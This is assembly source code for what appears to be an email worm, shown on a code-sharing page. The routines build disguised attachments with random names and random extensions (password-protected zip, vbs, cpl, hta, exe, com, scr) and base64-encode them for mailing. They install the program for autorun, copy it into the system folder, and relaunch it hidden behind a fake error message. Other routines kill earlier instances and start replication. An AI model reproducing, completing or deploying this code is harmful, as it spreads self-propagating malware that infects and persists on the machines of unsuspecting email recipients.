📄 startup.asm
字号:
LOCAL lpDestFileName, lpSrcFileName, lpOrigFileName, lpTextFileName, lpTextFileName2: DWORD
LOCAL buf2[30]: BYTE
LOCAL buf[30]: BYTE
invoke GlobalAlloc, GPTR, 8192
mov lpTextFileName, eax
invoke GlobalAlloc, GPTR, 8192
mov lpTextFileName2, eax
invoke GetRandomID, eax, 6
invoke GlobalAlloc, GPTR, 8192
mov lpDestFileName, eax
invoke lstrcpy, lpDestFileName, offset szSysDirFileName
invoke StrDup, lpDestFileName
mov lpOrigFileName, eax
invoke lstrcat, lpDestFileName, offset szTextOpen
invoke StrDup, lpDestFileName
mov lpSrcFileName, eax
invoke lstrcat, lpDestFileName, offset szTextOpen
invoke lstrcpy, lpTextFileName, lpDestFileName
invoke lstrcat, lpTextFileName, offset szTextOpen
invoke lstrcat, lpTextFileName, offset szTextOpen
invoke SetFileAttributes, lpSrcFileName, FILE_ATTRIBUTE_NORMAL
invoke SetFileAttributes, lpTextFileName, FILE_ATTRIBUTE_NORMAL
invoke SetFileAttributes, lpDestFileName, FILE_ATTRIBUTE_NORMAL
invoke CopyFile, lpOrigFileName, lpSrcFileName, FALSE
; Zero set password
invoke ZeroMemory, offset szZipPassBuff, 100
; Remove junk bytes
invoke TruncSrcFile, lpSrcFileName
; Random bytes in .xxx file
invoke ZeroMemory, addr buf2, 30
invoke Rand, 5
add eax, 5
invoke GetRandomID, addr buf2, eax
invoke EmailRandomExt
invoke lstrcat, addr buf2, eax
; Choose random .exe name for zip attach
invoke ZeroMemory, addr buf, 30
invoke Rand, 5
add eax, 5
invoke GetRandomID, addr buf, eax
invoke lstrcat, addr buf, offset szExeExe
invoke Rand, 100
.IF eax >= 50
; 50% zip, vbs, cpl, hta
invoke Rand, 100
.IF eax >= 80
; 20% zip
; Create junk file
invoke CreateFile, lpTextFileName, GENERIC_WRITE or GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, 0, NULL
mov hFile2, eax
invoke lstrlen, lpTextFileName2
xchg eax, edx
invoke WriteFile, hFile2, lpTextFileName2, edx, addr dwWritten, NULL
invoke CloseHandle, hFile2
; Gen password
invoke GetRandomNumID, offset szZipPassBuff, 5
invoke EncodePass, offset szZipPassBuff
mov szAttachExt, offset szExeZip
invoke CreateZipFile, lpSrcFileName, lpTextFileName, lpDestFileName, addr buf, addr buf2, offset szZipPassBuff
.ELSEIF eax >= 50
; 30% vbs
mov szAttachExt, offset szExeVbs
invoke CreateVBSFile, lpSrcFileName, lpDestFileName
.ELSEIF eax >= 20
; 30% cpl
mov szAttachExt, offset szExeCpl
invoke CreateCPLFile, lpSrcFileName, lpDestFileName
.ELSE
; 20% hta
mov szAttachExt, offset szExeHta
invoke CreateHTAFile, lpSrcFileName, lpDestFileName
.ENDIF
.ELSE
; 50% plain
invoke Rand, 100
.IF eax >= 80
; 20% exe
mov szAttachExt, offset szExeExe
.ELSEIF eax >= 40
; 40% com
mov szAttachExt, offset szExeCom
.ELSE
; 40% scr
mov szAttachExt, offset szExeScr
.ENDIF
invoke SetFileAttributes, lpDestFileName, FILE_ATTRIBUTE_NORMAL
invoke CopyFile, lpSrcFileName, lpDestFileName, FALSE
.ENDIF
test eax, eax
jz @file_open_error
invoke FileToBase64, lpDestFileName, offset b64Attach, offset b64AttachLen
@file_open_error:
invoke GlobalFree, lpDestFileName
invoke LocalFree, lpSrcFileName
invoke LocalFree, lpOrigFileName
invoke GlobalFree, lpTextFileName
invoke GlobalFree, lpTextFileName2
IFNDEF DisableInfect
invoke LoadWorkFile, offset szSysDirFileName
ENDIF
ret
EncodeSelf endp
IsShouldRun proc
LOCAL SysTime: SYSTEMTIME
LOCAL UntilTime: SYSTEMTIME
LOCAL FilTime: FILETIME
LOCAL UntilFil: FILETIME
invoke GetLocalTime, addr SysTime
invoke ZeroMemory, addr UntilTime, sizeof SYSTEMTIME
mov UntilTime.wYear, WorkUntilYear
mov UntilTime.wMonth, WorkUntilMonth
mov UntilTime.wDay, WorkUntilDay
invoke SystemTimeToFileTime, addr SysTime, addr FilTime
invoke SystemTimeToFileTime, addr UntilTime, addr UntilFil
invoke CompareFileTime, addr FilTime, addr UntilFil
.IF eax == 1
xor eax, eax
.ELSE
xor eax, eax
inc eax
.ENDIF
ret
IsShouldRun endp
; Delete previous instance if running
KillPrevInst proc uses esi ebx
LOCAL Process: PROCESSENTRY32
LOCAL hSnapshot: DWORD
invoke GetCurrentProcessId
mov esi, eax
mov ebx, offset szBglRealName
inc ebx
mov Process.dwSize, sizeof PROCESSENTRY32
invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
mov hSnapshot, eax
invoke Process32First, hSnapshot, addr Process
@l:
.IF eax
invoke StrStrI, addr Process.szExeFile, ebx
.IF (eax) && (Process.th32ProcessID != esi)
invoke KillProcess, Process.th32ProcessID
.ENDIF
invoke Process32Next, hSnapshot, addr Process
jmp @l
.ENDIF
invoke CloseHandle, hSnapshot
IFNDEF TESTVERSION
invoke Sleep, 3500
ENDIF
xor eax, eax
ret
KillPrevInst endp
StartUp proc
LOCAL upd: DWORD
mov upd, FALSE
invoke CRC32BuildTable
invoke Randomize
invoke EmailRandInit
; Get loader filename & add it to autorun
invoke GetSystemDirectory, offset szSysDirFileName, MAX_PATH
invoke lstrcat, offset szSysDirFileName, offset szBglRealName
invoke GetModuleFileName, NULL, offset szRunFileName, MAX_PATH
invoke WriteAutoStart
invoke SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
invoke GetCommandLine
@check_upd_loop:
cmp dword ptr[eax+1], 'dpu-'
jz @do_update
IFDEF TESTVERSION
cmp dword ptr[eax+1], 'led-'
jz @do_del
ENDIF
inc eax
cmp byte ptr[eax+4], 0
jnz @check_upd_loop
jmp @do_not_update
IFDEF TESTVERSION
@do_del:
invoke KillPrevInst
invoke DoSelfDelete
ENDIF
@do_update:
mov upd, TRUE
invoke KillPrevInst
@do_not_update:
; Check if running from system folder
invoke lstrcmpi, offset szRunFileName, offset szSysDirFileName
.IF eax
; Running from unknown folder
; Show error message
.IF !upd
invoke GetDesktopWindow
invoke MessageBox, eax, offset szShowMessage, offset szShowCaption, MB_ICONERROR
.ENDIF
; Copy file to %system% folder and run
invoke SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
invoke CopyFile, offset szRunFileName, offset szSysDirFileName, FALSE
.IF eax
invoke SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
invoke ShellExecute, 0, offset szTextOpen, offset szSysDirFileName, NULL, NULL, SW_HIDE
.ENDIF
invoke ExitProcess, 0
.ELSE
; Running from system folder, start replacation code
.ENDIF
ret
StartUp endp
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -